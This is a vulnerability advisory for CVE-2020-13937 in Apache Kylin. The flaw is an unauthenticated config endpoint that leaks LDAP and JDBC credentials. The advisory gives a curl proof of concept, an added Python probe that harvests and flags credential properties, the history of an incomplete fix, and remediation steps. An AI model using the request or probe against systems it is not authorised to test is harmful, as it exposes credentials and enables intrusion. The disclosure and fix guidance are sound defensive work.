CVE: CVE-2020-13937
Tested Versions:
Product URL(s):
There is an unauthenticated configuration disclosure via the /kylin/api/admin/config GET API endpoint.
The getConfig() method of AdminController.java, which handles the /kylin/api/admin/config endpoint, did not include any security checks. This allowed an unauthenticated user to disclose all Kylin configuration settings, including sensitive information such as LDAP and JDBC credentials.
curl http://127.0.0.1:7070/kylin/api/admin/config
The response contains the configuration loaded from kylin.properties (/home/admin/apache-kylin-3.1.0-bin-hbase1x/conf/kylin.properties in the Docker container).
Note: This vulnerability can be exploited regardless of whether kylin.security.profile is set to testing (the default for the Docker image), ldap or saml.
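As an added check (example code written for this page, not part of the advisory or of the Kylin project), the following Python script issues the same unauthenticated GET and classifies the answer. It assumes a response shape the advisory does not state: a JSON object whose "config" member is a string in java.util.Properties format (it falls back to treating the raw body as properties text), and it treats HTTP 401/403 as the admin check being enforced. The sample body, the property names in it and the credential-marker list are constructed for the demonstration and are not captured from a real instance or taken from Kylin's own code.

```python
#!/usr/bin/env python3
"""Probe for the unauthenticated /kylin/api/admin/config disclosure (CVE-2020-13937).

Added example, not the advisory's or the Kylin project's code.
Assumptions (not stated on the page): the endpoint answers with a JSON object
whose "config" member is a string in java.util.Properties format; HTTP 401/403
means the admin check is in place. Only keys starting with "kylin." count as
disclosed configuration, so a login page returned with HTTP 200 is not a hit.
"""
import json
import re
import sys
import urllib.error
import urllib.request

# Heuristic markers for credential-bearing property names (constructed list, not Kylin's).
SENSITIVE_MARKERS = ("password", "passwd", "secret", ".pass", "credential", "token")


def parse_properties(text: str) -> dict:
    """Parse java.util.Properties-style text: key=value or key: value, '#'/'!' comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def extract_config(body: str) -> dict:
    """Pull properties out of a response body: assumed {"config": "<properties text>"}
    shape first, then the raw body as properties text."""
    try:
        data = json.loads(body)
        if isinstance(data, dict) and isinstance(data.get("config"), str):
            return parse_properties(data["config"])
    except ValueError:
        pass
    return parse_properties(body)


def sensitive_keys(props: dict) -> list:
    """Names of non-empty properties that look like credentials."""
    return sorted(k for k, v in props.items()
                  if v and any(marker in k.lower() for marker in SENSITIVE_MARKERS))


def classify(status: int, body: str) -> dict:
    """Decide whether an unauthenticated response shows the vulnerable behaviour."""
    if status in (401, 403):
        return {"vulnerable": False, "reason": f"HTTP {status}: admin check enforced", "sensitive": []}
    if status != 200:
        return {"vulnerable": False, "reason": f"HTTP {status}: inconclusive", "sensitive": []}
    props = extract_config(body)
    kylin_props = {k: v for k, v in props.items() if k.startswith("kylin.")}
    if not kylin_props:
        return {"vulnerable": False, "reason": "HTTP 200 but no kylin.* properties in body", "sensitive": []}
    return {"vulnerable": True,
            "reason": f"HTTP 200 with {len(kylin_props)} kylin.* properties disclosed",
            "sensitive": sensitive_keys(kylin_props)}


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """Issue the GET with no Authorization header on purpose and classify the reply."""
    req = urllib.request.Request(base_url.rstrip("/") + "/kylin/api/admin/config",
                                 headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample of what a vulnerable instance is assumed to return (not a real capture).
SAMPLE_VULNERABLE_BODY = json.dumps({"config": "\n".join([
    "# constructed kylin.properties excerpt",
    "kylin.security.profile=ldap",
    "kylin.security.ldap.connection-server=ldap://ldap.example.invalid:389",
    "kylin.security.ldap.connection-username=cn=kylin,dc=example,dc=invalid",
    "kylin.security.ldap.connection-password=Hunter2!",
    "kylin.source.jdbc.user=kylin",
    "kylin.source.jdbc.pass=jdbc-secret",
])})

if __name__ == "__main__":
    # With a base URL argument the script probes a live host; without one it
    # classifies the constructed sample so the logic can be exercised offline.
    result = probe(sys.argv[1]) if len(sys.argv) > 1 else classify(200, SAMPLE_VULNERABLE_BODY)
    print(json.dumps(result, indent=2))
    sys.exit(1 if result["vulnerable"] else 0)
```

Run it as `python3 probe.py http://127.0.0.1:7070` against a test instance; a non-zero exit with credential key names in "sensitive" reproduces the disclosure, while an HTTP 401/403 after applying one of the fixes below confirms the admin check is enforced.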
In /server-base/src/main/java/org/apache/kylin/rest/controller/AdminController.java, the getConfig() method which handles the /kylin/api/admin/config GET API endpoint does not ensure that the user is an admin.
This vulnerability has existed since the inception of the project. In an October 2014 commit, there is an admin check for the endpoint which had been commented out. Fast-forwarding to commit e3fe6b7 made in April 2017, it appears that Kylin developers were aware that not performing the necessary admin check when obtaining the configuration properties is indeed a critical security vulnerability, and had tracked this issue as KYLIN-1664 internally.
In commit 4629d84 made in December 2017, Kylin developers attempted to mitigate the vulnerability by introducing a new /kylin/api/admin/public_config endpoint that discloses only whitelisted configuration properties. In addition, the /config PUT endpoint was updated to include an admin check to prevent unauthenticated users from modifying the Kylin configuration.
Code refactoring was also performed in the same commit, removing the commented-out admin check for the /kylin/api/admin/config GET endpoint from the codebase without adding an effective admin check for the endpoint or for fetching the configuration details.
This incomplete fix was unfortunately thought to have resolved the vulnerability. In the changelog of Kylin 2.3.0, the above changes are listed as [KYLIN-1664] - Harden security check for '/kylin/api/admin/config' API.
Below are some recommendations on how this vulnerability can be remediated.
Either add the @PreAuthorize(Constant.ACCESS_HAS_ROLE_ADMIN) annotation to the getConfig() method in /server-base/src/main/java/org/apache/kylin/rest/controller/AdminController.java, or edit /server/src/main/resources/kylinSecurity.xml by replacing <scr:intercept-url pattern="/api/admin/config" access="permitAll"/> on line 256 (for the testing and ldap security profiles) and line 308 (for the saml security profile) with <scr:intercept-url pattern="/api/admin/config" access="hasRole('ROLE_ADMIN')"/>.
Whichever option is chosen, repeat the unauthenticated curl request from above afterwards and confirm that the endpoint no longer returns the configuration.